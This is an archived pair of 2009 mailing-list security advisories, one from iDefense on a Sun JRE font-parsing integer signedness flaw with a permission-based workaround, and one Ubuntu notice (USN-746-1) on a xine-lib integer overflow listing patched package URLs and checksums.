Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4EB0A2379BC; Fri, 27 Mar 2009 10:49:55 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 23051 invoked from network); 26 Mar 2009 17:49:26 -0000
Message-ID: <49CBC037.8060007@idefense.com>
Date: Thu, 26 Mar 2009 13:49:43 -0400
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.21 (Windows/20090302)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 03.26.09: Sun Java Runtine Environment
(JRE) Type1 Font Parsing Integer Signedness Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iDefense Security Advisory 03.25.09
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 25, 2009
I. BACKGROUND
The Sun Java JRE is Sun's implementation of the Java runtime. For more
information, see the vendor's site found at the following link.
http://www.java.com
II. DESCRIPTION
Remote exploitation of an integer signedness vulnerability in Sun
Microsystems Inc.'s Java JRE could allow an attacker to execute
arbitrary code with the privileges of the current user.
The vulnerability exists within the font parsing code in the JRE. As
part of its font API, the JRE provides the ability to load a font from
a remote URL.
The vulnerability occurs when parsing glyph description instructions in
the font file. When parsing the glyph descriptions, a 16bit signed
counter is used as the index to store the next glyph point value. This
counter is compared to a 32bit value that represents the maximum size
of the heap buffer. Under certain conditions, the 16bit counter will be
interpreted as a negative value, which allows the attacker to store data
before the allocated buffer.
III. ANALYSIS
Exploitation allows attackers to execute arbitrary code in the context
of the currently logged-on user. To exploit this vulnerability, a
targeted user must load a malicious Web page created by an attacker. An
attacker typically accomplishes this via social engineering or injecting
content into compromised, trusted sites.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Sun
Microsystem Inc.'s Java JRE version 1.6.0_11 for Windows. Previous
versions and versions for other platforms may also be affected.
Sun Microsystems reports that the vulnerability can occur in the
following Java SE and Java SE for Business releases for Windows,
Solaris, and Linux:
* JDK and JRE 6 Update 12 and earlier
* JDK and JRE 5.0 Update 17 and earlier
V. WORKAROUND
There is a potential workaround for the vulnerability, but it renders
the JRE unusable. It is possible to use the cacls program to change the
file permissions on fontmanager.dll. This will prevent the vulnerable
library from loading. This workaround can be applied with the following
command line:
echo y| cacls "C:\Program
Files\Java\**JRE_VERSION**\bin\fontmanager.dll" /E /P everyone:N
However, this workaround has a serious impact on the functionality of
the JRE. When a webpage attempts to load an applet, the JRE will abort
with a runtime error, and the browser will close.
VI. VENDOR RESPONSE
Sun Microsystem Inc. has released a patch which addresses this issue.
For more information, consult their advisory at the following URL:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-254571-1
VII. CVE INFORMATION
A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.
VIII. DISCLOSURE TIMELINE
02/18/2009 - Initial Contact
02/18/2009 - PoC Requested
02/19/2009 - PoC Sent
03/10/2009 - Disclosure Date Set
03/25/2009 - Coordinated Public Disclosure
IX. CREDIT
This vulnerability was discovered by Sean Larsson, iDefense.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright � 2009 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla -
http://enigmail.mozdev.org
iD8DBQFJy8A1bjs6HoxIfBkRAoAHAJ9XaF14FxsjJ7UNZzhieQK0ovJmZgCgw9vz
CCcIVkotSAaGK4tT9/x/QxI=mc3z
-----END PGP SIGNATURE-----
From - Fri Mar 27 14:22:54 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006d3a
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39849-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7890DEC10B
for <lists@securityspace.com>; Fri, 27 Mar 2009 14:15:49 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 112B5236F97; Fri, 27 Mar 2009 10:50:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25975 invoked from network); 26 Mar 2009 19:25:15 -0000
Subject: [USN-746-1] xine-lib vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound:
uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -18
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.74.0.128
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-4WqfmitOoPo1pECx714A"
Date: Thu, 26 Mar 2009 15:27:37 -0400
Message-Id: <1238095657.13798.5.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.26.0
Status:
--=-4WqfmitOoPo1pECx714A
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
===========================================================
Ubuntu Security Notice USN-746-1 March 26, 2009
xine-lib vulnerability
CVE-2009-0698, https://launchpad.net/bugs/322834
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libxine-main1 1.1.1+ubuntu2-7.11
Ubuntu 7.10:
libxine1 1.1.7-1ubuntu1.5
Ubuntu 8.04 LTS:
libxine1 1.1.11.1-1ubuntu3.3
Ubuntu 8.10:
libxine1 1.1.15-0ubuntu3.2
After a standard system upgrade you need to restart applications linked
against xine-lib, such as Totem-xine and Amarok, to effect the necessary
changes.
Details follow:
It was discovered that the 4xm demuxer in xine-lib did not correctly handle
a large current_track value in a 4xm file, resulting in an integer
overflow. If a user or automated system were tricked into opening a
specially crafted 4xm movie file, an attacker could crash xine-lib or
possibly execute arbitrary code with the privileges of the user invoking
the program. (CVE-2009-0698)
USN-710-1 provided updated xine-lib packages to fix multiple security
vulnerabilities. The security patch to fix CVE-2008-5239 introduced a
regression causing some media files to be unplayable. This update corrects
the problem. We apologize for the inconvenience.
Original advisory details:
It was discovered that the input handlers in xine-lib did not correctly
handle certain error codes, resulting in out-of-bounds reads and heap-
based buffer overflows. If a user or automated system were tricked into
opening a specially crafted file, stream, or URL, an attacker could
execute arbitrary code as the user invoking the program. (CVE-2008-5239)
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.11.diff.gz
Size/MD5: 34559 dbe32654025898cc0f6f4ac588ab537a
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.11.dsc
Size/MD5: 1123 b771b610f5db52ed2951d9fed6145c87
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2.orig.tar.gz
Size/MD5: 6099365 5d0f3988e4d95f6af6f3caf2130ee992
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.11_amd64.deb
Size/MD5: 117770 c6511352efac6c5d85abb47983d19f15
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.11_amd64.deb
Size/MD5: 2618312 6b1158e147c7df48710c7a9e216fb633
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.11_i386.deb
Size/MD5: 117772 e27010b5942e998d059756350c276a78
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.11_i386.deb
Size/MD5: 2938064 c0459d5720863887c7eba00487ef5a14
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.11_powerpc.deb
Size/MD5: 117774 e1289584caeb902d6255734658b0629b
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.11_powerpc.deb
Size/MD5: 2730688 516d2466cca9ab6b6c841135192fefd7
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.11_sparc.deb
Size/MD5: 117778 f3a74e478c8cd1e9b4da1374f02eb4aa
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.11_sparc.deb
Size/MD5: 2596250 3951ce40a8f1e014cbfecbed64e1f736
Updated packages for Ubuntu 7.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.7-1ubuntu1.5.diff.gz
Size/MD5: 116473 76a22e2f161b71bb96726e9e5b1a7870
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.7-1ubuntu1.5.dsc
Size/MD5: 1700 da8358896f87eb1500d7b567a099d927
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.7.orig.tar.gz
Size/MD5: 8868650 a613a3adf44b5098e04842250dbd2251
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.7-1ubuntu1.5_all.deb
Size/MD5: 322540 61ebba17321896523fb7fcc5509cabf9
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-doc_1.1.7-1ubuntu1.5_all.deb
Size/MD5: 127666 c47491b5793c30e27f1649be63675168
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-plugins_1.1.7-1ubuntu1.5_all.deb
Size/MD5: 46428 68fe26f193995c03c7d7186a0fdcf0ba
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.7-1ubuntu1.5_amd64.deb
Size/MD5: 3142538 da1847ec381a8cb0fa53cd5093c64dbd
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.7-1ubuntu1.5_amd64.deb
Size/MD5: 2384664 75df99094cbd4d3590a8230e5673eab0
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-console_1.1.7-1ubuntu1.5_amd64.deb
Size/MD5: 80116 da2da2dd8b6fdf5caa9dd1e8d047011f
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.7-1ubuntu1.5_amd64.deb
Size/MD5: 446082 47a90b2ac690f4c896ec666d707129a3
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.7-1ubuntu1.5_amd64.deb
Size/MD5: 61054 178a718da5107101ecaf4f7ec12b3445
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.7-1ubuntu1.5_i386.deb
Size/MD5: 3273432 01ffee18c9c4f7e5a3588b8b33fce427
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.7-1ubuntu1.5_i386.deb
Size/MD5: 2493824 a2d09d512c50b9784a725d7ca5af6549
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-console_1.1.7-1ubuntu1.5_i386.deb
Size/MD5: 81022 af8b98207ce4a59987d3ff4f1be5b672
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.7-1ubuntu1.5_i386.deb
Size/MD5: 450762 c58f4385d2005337d9cc631d851f8dd8
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.7-1ubuntu1.5_i386.deb
Size/MD5: 60476 c22a7d81254f7cb11009af9dbb50dc3d
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.7-1ubuntu1.5_lpia.deb
Size/MD5: 3052564 9700ee1ec330f5ad8d384086712d5824
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.7-1ubuntu1.5_lpia.deb
Size/MD5: 2366358 3ba2d56d4c61c33acf40c38133dc1e0b
http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-console_1.1.7-1ubuntu1.5_lpia.deb
Size/MD5: 80180 ddf69118956cd39630b78cd5cbb1a842
http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.7-1ubuntu1.5_lpia.deb
Size/MD5: 445920 ffb389559737f15b5fec40729cda94e9
http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-gnome_1.1.7-1ubuntu1.5_lpia.deb
Size/MD5: 60398 b843951306e25c5c33281d0dbb15af8f
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.7-1ubuntu1.5_powerpc.deb
Size/MD5: 3190102 591f97a5186dddc09544c0241eafa304
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.7-1ubuntu1.5_powerpc.deb
Size/MD5: 2586380 6b3946acced77c0ae1dd6cdb89aad5b3
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-console_1.1.7-1ubuntu1.5_powerpc.deb
Size/MD5: 84816 a8a545f112c8126c280154b54b855585
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.7-1ubuntu1.5_powerpc.deb
Size/MD5: 479026 2f87238ef7f045fa03dacd70fa66ec87
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.7-1ubuntu1.5_powerpc.deb
Size/MD5: 67008 0ee12c43f099703ef0f873f9d55281a9
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.7-1ubuntu1.5_sparc.deb
Size/MD5: 2862934 549fc2873807950082ba6ff4b559ae9f
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.7-1ubuntu1.5_sparc.deb
Size/MD5: 2354832 fdf025670a586f4100b8abe161a654c7
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-console_1.1.7-1ubuntu1.5_sparc.deb
Size/MD5: 76060 855ba5dc4c27b232f7b76ae2545da9e0
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.7-1ubuntu1.5_sparc.deb
Size/MD5: 454592 d75bcdc70d9ebba2ec53375dbd1a2b13
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.7-1ubuntu1.5_sparc.deb
Size/MD5: 60580 e117a141a6ab28a801706699ccab1ca0
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.11.1-1ubuntu3.3.diff.gz
Size/MD5: 125126 bd7c94ea71a97240939bc78d8f0e9319
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.11.1-1ubuntu3.3.dsc
Size/MD5: 1876 6c6378a17bd9fe8fb6ad7c51c86d5292
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.11.1.orig.tar.gz
Size/MD5: 9056527 08f6d8ed03d98ec43a5ee1386ce83a00
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-doc_1.1.11.1-1ubuntu3.3_all.deb
Size/MD5: 143372 c01ce212a82e3ec8f8611dabb1861496
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-all-plugins_1.1.11.1-1ubuntu3.3_all.deb
Size/MD5: 53558 880a7007744d39108f1f8d2e4e81c994
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-plugins_1.1.11.1-1ubuntu3.3_all.deb
Size/MD5: 53544 911093200158392aa99bf4ac83c7ef09
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.11.1-1ubuntu3.3_amd64.deb
Size/MD5: 328502 6774de8ec6489325d504fbec6fbcebc9
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-bin_1.1.11.1-1ubuntu3.3_amd64.deb
Size/MD5: 1221600 d5d6c5fb1856828e9c040c0468062b07
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-console_1.1.11.1-1ubuntu3.3_amd64.deb
Size/MD5: 58116 51670c77b101ce7e56105e18006ed847
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.11.1-1ubuntu3.3_amd64.deb
Size/MD5: 3965554 0ca486123e227698879533c0bbb954a7
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.11.1-1ubuntu3.3_amd64.deb
Size/MD5: 940490 8fb260801737f409e0b456d854939fa9
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-x_1.1.11.1-1ubuntu3.3_amd64.deb
Size/MD5: 207560 6b790034bc4a473f5b79127d31aecf37
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.11.1-1ubuntu3.3_amd64.deb
Size/MD5: 1316 54727269b576f237e9f21df753ec4f7a
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.11.1-1ubuntu3.3_amd64.deb
Size/MD5: 393632 72e13f9d4b81372999da2c6b7ee8fa90
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.11.1-1ubuntu3.3_amd64.deb
Size/MD5: 15318 3d74500f8df4e7b667f1de98a8e35be9
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.11.1-1ubuntu3.3_i386.deb
Size/MD5: 328494 f5562c252cffe7db5df432a2267d751b
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-bin_1.1.11.1-1ubuntu3.3_i386.deb
Size/MD5: 1329542 be57f2be04364645585020c0c0d5940f
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-console_1.1.11.1-1ubuntu3.3_i386.deb
Size/MD5: 58108 7f96c26d68a69d20c0d871ba5e6c8f20
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.11.1-1ubuntu3.3_i386.deb
Size/MD5: 4053648 39b64f13d53bc7c3a4cf9dd3d5769629
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.11.1-1ubuntu3.3_i386.deb
Size/MD5: 928014 d02535d5dfbd8af990f6fffa95ef49a6
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-x_1.1.11.1-1ubuntu3.3_i386.deb
Size/MD5: 203452 5dd6f64287ba55f7362611c6437c58f8
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.11.1-1ubuntu3.3_i386.deb
Size/MD5: 1314 eb6656f3cc277324882bd6b2b29125d6
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.11.1-1ubuntu3.3_i386.deb
Size/MD5: 396772 ca74bd0ff8f764b409d1ca565855405a
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.11.1-1ubuntu3.3_i386.deb
Size/MD5: 14780 0c0ba0feb08c0211824b8b21c6239db4
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine-dev_1.1.11.1-1ubuntu3.3_lpia.deb
Size/MD5: 328498 3b3d94d43d1666d0eda290021443e239
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-bin_1.1.11.1-1ubuntu3.3_lpia.deb
Size/MD5: 1215724 94e35832f522f57360d7d3b2521382d9
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-console_1.1.11.1-1ubuntu3.3_lpia.deb
Size/MD5: 58346 c4e2edbf7af08c486b8e3ab5c85f0ef1
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.11.1-1ubuntu3.3_lpia.deb
Size/MD5: 3797382 05809802c6ef01bcfc8a0b2b4b526fef
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.11.1-1ubuntu3.3_lpia.deb
Size/MD5: 927858 99976bdb5c721e1db30c00d5f638cded
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-x_1.1.11.1-1ubuntu3.3_lpia.deb
Size/MD5: 203654 50cbdedb3f37a892b6d6e3fa15b845ad
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.11.1-1ubuntu3.3_lpia.deb
Size/MD5: 1314 e10a8ac010b09c546d4599c3739b840a
http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.11.1-1ubuntu3.3_lpia.deb
Size/MD5: 396640 2351d1bf1c8bc349404d7654bfb5af08
http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-gnome_1.1.11.1-1ubuntu3.3_lpia.deb
Size/MD5: 14802 0820d8fe283f5fb3d002bc03f25a26ab
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine-dev_1.1.11.1-1ubuntu3.3_powerpc.deb
Size/MD5: 328526 701e3c9bda2a8511a72422a5d67a9eec
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-bin_1.1.11.1-1ubuntu3.3_powerpc.deb
Size/MD5: 1228584 a5d0be6a6daa981817fff7f953ca3400
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-console_1.1.11.1-1ubuntu3.3_powerpc.deb
Size/MD5: 61308 036d2ed42cc318b2ca9783532e910d62
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.11.1-1ubuntu3.3_powerpc.deb
Size/MD5: 3988586 a79a019dc5c99c8a38a8b672b82f0f68
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.11.1-1ubuntu3.3_powerpc.deb
Size/MD5: 1125726 bf1e52f9cd1e39bd44558ad5fdca28d1
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-x_1.1.11.1-1ubuntu3.3_powerpc.deb
Size/MD5: 218370 032a3c8558a06000a755fda6848498a5
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.11.1-1ubuntu3.3_powerpc.deb
Size/MD5: 1316 b647dc4877541e48fa3455b8983f0f99
http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.11.1-1ubuntu3.3_powerpc.deb
Size/MD5: 426242 699ed4ea6638829ccba0297dea326d8f
http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-gnome_1.1.11.1-1ubuntu3.3_powerpc.deb
Size/MD5: 21552 154a989dece7a91b7e7efc1f3f4b7d73
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine-dev_1.1.11.1-1ubuntu3.3_sparc.deb
Size/MD5: 328498 5025918783dc4e059fba4764b8643f27
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-bin_1.1.11.1-1ubuntu3.3_sparc.deb
Size/MD5: 1212492 05cba7a0249ae194aa1833cffdf2602c
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-console_1.1.11.1-1ubuntu3.3_sparc.deb
Size/MD5: 48608 995b1e8b78d44abdb92b519a97679eaa
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.11.1-1ubuntu3.3_sparc.deb
Size/MD5: 3597270 61a8de92df46db3688253ea91637f29a
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.11.1-1ubuntu3.3_sparc.deb
Size/MD5: 944732 3c8da9b4c9ba7ff09299af6cbf08ecfb
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-x_1.1.11.1-1ubuntu3.3_sparc.deb
Size/MD5: 176202 08cb62653624af70c0fb79743e5775e3
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.11.1-1ubuntu3.3_sparc.deb
Size/MD5: 1316 32a1e3ae3a9b429013584199b7b532da
http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.11.1-1ubuntu3.3_sparc.deb
Size/MD5: 400868 b14d7a5f3b97a352315b5e71259f5e4f
http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-gnome_1.1.11.1-1ubuntu3.3_sparc.deb
Size/MD5: 14630 fcf714decbc9aa6eb4a0b3c13f4dd3a6
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.15-0ubuntu3.2.diff.gz
Size/MD5: 41254 77d55801338fe1289c394d0fcc45da90
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.15-0ubuntu3.2.dsc
Size/MD5: 2335 cf427ca913569cfa1ffb289a3449828a
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.15.orig.tar.gz
Size/MD5: 9102819 a270252e1a1342e83d1596e2d42a7282
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-doc_1.1.15-0ubuntu3.2_all.deb
Size/MD5: 145436 9956a80c0d4455b62e7f97efd71da5ef
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-all-plugins_1.1.15-0ubuntu3.2_all.deb
Size/MD5: 55676 93fa74dbaa1665a4e31025ebfaa0f287
http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-plugins_1.1.15-0ubuntu3.2_all.deb
Size/MD5: 55668 c13473de5ab986c102c048d31054d539
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.15-0ubuntu3.2_amd64.deb
Size/MD5: 331948 666feb394e8cf1bc6a9e8713df08f58b
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-bin_1.1.15-0ubuntu3.2_amd64.deb
Size/MD5: 1232494 fa306767fc61f3da519a2a96e2b1304a
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-console_1.1.15-0ubuntu3.2_amd64.deb
Size/MD5: 58700 cf1f8f074db761c5c5bd010e56858e86
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.15-0ubuntu3.2_amd64.deb
Size/MD5: 4001498 13ca26c6f004574f04e8315b3fe20f41
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-ffmpeg_1.1.15-0ubuntu3.2_amd64.deb
Size/MD5: 393594 e37dd5c047d5fd4e74021b32bc88f12b
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-gnome_1.1.15-0ubuntu3.2_amd64.deb
Size/MD5: 15568 e3e8075adcb41a348a5f895dea80dda1
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.15-0ubuntu3.2_amd64.deb
Size/MD5: 924454 25e7f194ec05ef0bc39c6970cfd3d86a
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-x_1.1.15-0ubuntu3.2_amd64.deb
Size/MD5: 213378 24f5791685da86b3236211f23f9684f9
